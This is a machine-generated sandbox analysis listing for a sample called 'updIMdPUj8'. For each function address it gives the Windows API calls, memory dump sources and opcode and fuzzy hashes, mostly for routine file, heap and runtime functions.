                                                                                                                                                                          Function 00B4ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Alloc
                                                                                                                                                                          • String ID: FlsAlloc
                                                                                                                                                                          • API String ID: 2773662609-671089009
                                                                                                                                                                          • Opcode ID: 128e0495dfa340d162ffdd4243ad1dec2655eca5ff25c5d12c92bbbc8a814d8b
                                                                                                                                                                          • Instruction ID: c39e87636fbab5164dfef13d1192040b83fc0df95b61518fcef4d1595b7c2f9e
                                                                                                                                                                          • Opcode Fuzzy Hash: 128e0495dfa340d162ffdd4243ad1dec2655eca5ff25c5d12c92bbbc8a814d8b
                                                                                                                                                                          • Instruction Fuzzy Hash: 7EE0E531BC53187BC601AB65EC02B6EBBD5DB44B62F1101E9FC05A7350DD715F4096E6
                                                                                                                                                                          Function 00B3EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3EAF9
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: 3Ro
                                                                                                                                                                          • API String ID: 1269201914-1492261280
                                                                                                                                                                          • Opcode ID: 92ad1b168865d3720a76004e30b3b6162502db4373e53d753796dc64e59ca964
                                                                                                                                                                          • Instruction ID: 957aa348b3cc3e147690ed4f51ace9f0ff10fe75a113478a3992f094acb4c3ea
                                                                                                                                                                          • Opcode Fuzzy Hash: 92ad1b168865d3720a76004e30b3b6162502db4373e53d753796dc64e59ca964
                                                                                                                                                                          • Instruction Fuzzy Hash: F3B012C729A142BC310472001D42D3711CDC0C0F9173080EFF820CC0E2EC808D060431
                                                                                                                                                                          Function 00B4BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B4B7BB: GetOEMCP.KERNEL32(00000000,?,?,00B4BA44,?), ref: 00B4B7E6
                                                                                                                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00B4BA89,?,00000000), ref: 00B4BC64
                                                                                                                                                                          • GetCPInfo.KERNEL32(00000000,00B4BA89,?,?,?,00B4BA89,?,00000000), ref: 00B4BC77
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CodeInfoPageValid
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 546120528-0
                                                                                                                                                                          • Opcode ID: 62734ecfbff7c1c42e2bb6bfbaddc9422d65079c0748a3495160c1bf913a417a
                                                                                                                                                                          • Instruction ID: dc8bf65a40656017038797d09b1a364873bbffd50cb1534c4c96080dd31b9191
                                                                                                                                                                          • Opcode Fuzzy Hash: 62734ecfbff7c1c42e2bb6bfbaddc9422d65079c0748a3495160c1bf913a417a
                                                                                                                                                                          • Instruction Fuzzy Hash: 7451E170D042459EDB248F75C8C1EBABBE5EF41300F2844FED6968B262DB35DB45AB90
                                                                                                                                                                          Function 00B29A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00B29A50,?,?,00000000,?,?,00B28CBC,?), ref: 00B29BAB
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00B28411,-00009570,00000000,000007F3), ref: 00B29BB6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                                          • Opcode ID: 1b850c5e7e09bba7d5552a3cdd3f2d07c783c0ecdd36b76f1314b5db91252448
                                                                                                                                                                          • Instruction ID: a63d91a81db7cd73f9f514fdcbe3a1abb419c3dce7f7204113a3555889970bee
                                                                                                                                                                          • Opcode Fuzzy Hash: 1b850c5e7e09bba7d5552a3cdd3f2d07c783c0ecdd36b76f1314b5db91252448
                                                                                                                                                                          • Instruction Fuzzy Hash: 2541E131A043218FEB24DF25F58856AB7E5FFD9720F148AADE89D83260D770ED448B91
                                                                                                                                                                          Function 00B4BA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B497E5: GetLastError.KERNEL32(?,00B61030,00B44674,00B61030,?,?,00B43F73,00000050,?,00B61030,00000200), ref: 00B497E9
                                                                                                                                                                            • Part of subcall function 00B497E5: _free.LIBCMT ref: 00B4981C
                                                                                                                                                                            • Part of subcall function 00B497E5: SetLastError.KERNEL32(00000000,?,00B61030,00000200), ref: 00B4985D
                                                                                                                                                                            • Part of subcall function 00B497E5: _abort.LIBCMT ref: 00B49863
                                                                                                                                                                            • Part of subcall function 00B4BB4E: _abort.LIBCMT ref: 00B4BB80
                                                                                                                                                                            • Part of subcall function 00B4BB4E: _free.LIBCMT ref: 00B4BBB4
                                                                                                                                                                            • Part of subcall function 00B4B7BB: GetOEMCP.KERNEL32(00000000,?,?,00B4BA44,?), ref: 00B4B7E6
                                                                                                                                                                          • _free.LIBCMT ref: 00B4BA9F
                                                                                                                                                                          • _free.LIBCMT ref: 00B4BAD5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorLast_abort
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2991157371-0
                                                                                                                                                                          • Opcode ID: 825c38e7565c24e3e0be7917f65d0b5429553f2a62d876535675e4da814574f6
                                                                                                                                                                          • Instruction ID: 2121a962fe6291f28854af84285af25d6ca699956ca625f5fa50f0cd46e4055b
                                                                                                                                                                          • Opcode Fuzzy Hash: 825c38e7565c24e3e0be7917f65d0b5429553f2a62d876535675e4da814574f6
                                                                                                                                                                          • Instruction Fuzzy Hash: 3D316E31904209AFDB149BA8D441F9DB7F5EB40320F2544D9EA149B2A2EF729F41EB50
                                                                                                                                                                          Function 00B21E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B21E55
                                                                                                                                                                            • Part of subcall function 00B23BBA: __EH_prolog.LIBCMT ref: 00B23BBF
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B21EFD
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog$_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2838827086-0
                                                                                                                                                                          • Opcode ID: ff32ec40b84f83d9ba40eaa5752d95b930111ab9aae2a6822761d34cd7af8ea4
                                                                                                                                                                          • Instruction ID: 523e10f7d063737afd312cff2a8b231480ac8a48c9063987b1b30a10c4b787b3
                                                                                                                                                                          • Opcode Fuzzy Hash: ff32ec40b84f83d9ba40eaa5752d95b930111ab9aae2a6822761d34cd7af8ea4
                                                                                                                                                                          • Instruction Fuzzy Hash: FC312B719052199FCF15EF98D985AEEFBF6EF58300F2008A9E849A7251D7365E10CB60
                                                                                                                                                                          Function 00B29DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00B273BC,?,?,?,00000000), ref: 00B29DBC
                                                                                                                                                                          • SetFileTime.KERNELBASE(?,?,?,?), ref: 00B29E70
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$BuffersFlushTime
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1392018926-0
                                                                                                                                                                          • Opcode ID: bcb68b1c710180f7530a80c8a5089f6f1abfa3fa68078de6cbe50d36f838bc86
                                                                                                                                                                          • Instruction ID: e8501f8fe57ad23b8396a98da9b7b7ae0988dabe3a5848c9368fb62da449ef03
                                                                                                                                                                          • Opcode Fuzzy Hash: bcb68b1c710180f7530a80c8a5089f6f1abfa3fa68078de6cbe50d36f838bc86
                                                                                                                                                                          • Instruction Fuzzy Hash: 1C21D031248355ABC714DF38D891BABBBE8EF55744F0849ACF4CD87181D329E90D9B62
                                                                                                                                                                          Function 00B2966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00B29F27,?,?,00B2771A), ref: 00B296E6
                                                                                                                                                                          • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00B29F27,?,?,00B2771A), ref: 00B29716
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                          • Opcode ID: 6c34f9c03fa4890cd7a619cd723ade311a655124287f03e9aa0eb1b65699397d
                                                                                                                                                                          • Instruction ID: 93c98d52c9780d620b1a3e657b57d3cbc6b522123186d79fccf726db2d6c13ca
                                                                                                                                                                          • Opcode Fuzzy Hash: 6c34f9c03fa4890cd7a619cd723ade311a655124287f03e9aa0eb1b65699397d
                                                                                                                                                                          • Instruction Fuzzy Hash: 5321D071104354AFE3708A65DC89FB7B7DCEB49360F100A59FADEC65D1C778A8849A31
                                                                                                                                                                          Function 00B29E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00B29EC7
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00B29ED4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                                          • Opcode ID: e6ad3245c881b2a4d29c999d47dfd72eb306e14105bcb685a57b51dcc5d9286b
                                                                                                                                                                          • Instruction ID: 2c86d8807bcc3e024ff9b0686740efee8f3042e35ac2cdf3695971786f6d925a
                                                                                                                                                                          • Opcode Fuzzy Hash: e6ad3245c881b2a4d29c999d47dfd72eb306e14105bcb685a57b51dcc5d9286b
                                                                                                                                                                          • Instruction Fuzzy Hash: 2011E531600724EBE724E628D881BA6B7E8EB44370F554AA9E15ED26D0D770ED49C760
                                                                                                                                                                          Function 00B48E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 00B48E75
                                                                                                                                                                            • Part of subcall function 00B48E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B4CA2C,00000000,?,00B46CBE,?,00000008,?,00B491E0,?,?,?), ref: 00B48E38
                                                                                                                                                                          • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00B61098,00B217CE,?,?,00000007,?,?,?,00B213D6,?,00000000), ref: 00B48EB1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Heap$AllocAllocate_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2447670028-0
                                                                                                                                                                          • Opcode ID: 3ca7ffdb357e5891372ca7bda3cfb92b2d0fb3da2b1514e2e7a300669983da0a
                                                                                                                                                                          • Instruction ID: 640af52f2c67628d3fca4969e3ad688a1625cf9aa68a60ca52884933b08c4033
                                                                                                                                                                          • Opcode Fuzzy Hash: 3ca7ffdb357e5891372ca7bda3cfb92b2d0fb3da2b1514e2e7a300669983da0a
                                                                                                                                                                          • Instruction Fuzzy Hash: 00F09632685215A6DF212B65AC45B6F37E8CF81B70F2441E6F814A71A1DF71DF01B5A0
                                                                                                                                                                          Function 00B3109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?), ref: 00B310AB
                                                                                                                                                                          • GetProcessAffinityMask.KERNEL32(00000000), ref: 00B310B2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$AffinityCurrentMask
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1231390398-0
                                                                                                                                                                          • Opcode ID: 28517f9ed1e2fde04c294d92046e0b26cc92e26803b643c6093c8ccbdc76d041
                                                                                                                                                                          • Instruction ID: 7bf284e343f8355dddfe718dbc4cc66608bc84e882e7e349c4077087ccad2c02
                                                                                                                                                                          • Opcode Fuzzy Hash: 28517f9ed1e2fde04c294d92046e0b26cc92e26803b643c6093c8ccbdc76d041
                                                                                                                                                                          • Instruction Fuzzy Hash: 15E0D832B00249A7CF0D87B89C05AEB73DDEA44345B3485F6E403E7201FD30DE414A60
                                                                                                                                                                          Function 00B2A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B2A325,?,?,?,00B2A175,?,00000001,00000000,?,?), ref: 00B2A501
                                                                                                                                                                            • Part of subcall function 00B2BB03: _wcslen.LIBCMT ref: 00B2BB27
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B2A325,?,?,?,00B2A175,?,00000001,00000000,?,?), ref: 00B2A532
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AttributesFile$_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2673547680-0
                                                                                                                                                                          • Opcode ID: 77a760c0a1449a502f9d0eb086a3a911d28047f091ac1677fc8c9077190c3fa2
                                                                                                                                                                          • Instruction ID: 4997ca1456d09674e129c33e4aef29a7065d812af3d6c6b44efab7fff9ab84d9
                                                                                                                                                                          • Opcode Fuzzy Hash: 77a760c0a1449a502f9d0eb086a3a911d28047f091ac1677fc8c9077190c3fa2
                                                                                                                                                                          • Instruction Fuzzy Hash: 11F030312403197BDF026F60EC45FDA37ACEB14785F488491B949D61A0DB71DA94DA51
                                                                                                                                                                          Function 00B2A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • DeleteFileW.KERNELBASE(000000FF,?,?,00B2977F,?,?,00B295CF,?,?,?,?,?,00B52641,000000FF), ref: 00B2A1F1
                                                                                                                                                                            • Part of subcall function 00B2BB03: _wcslen.LIBCMT ref: 00B2BB27
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00B2977F,?,?,00B295CF,?,?,?,?,?,00B52641), ref: 00B2A21F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFile$_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2643169976-0
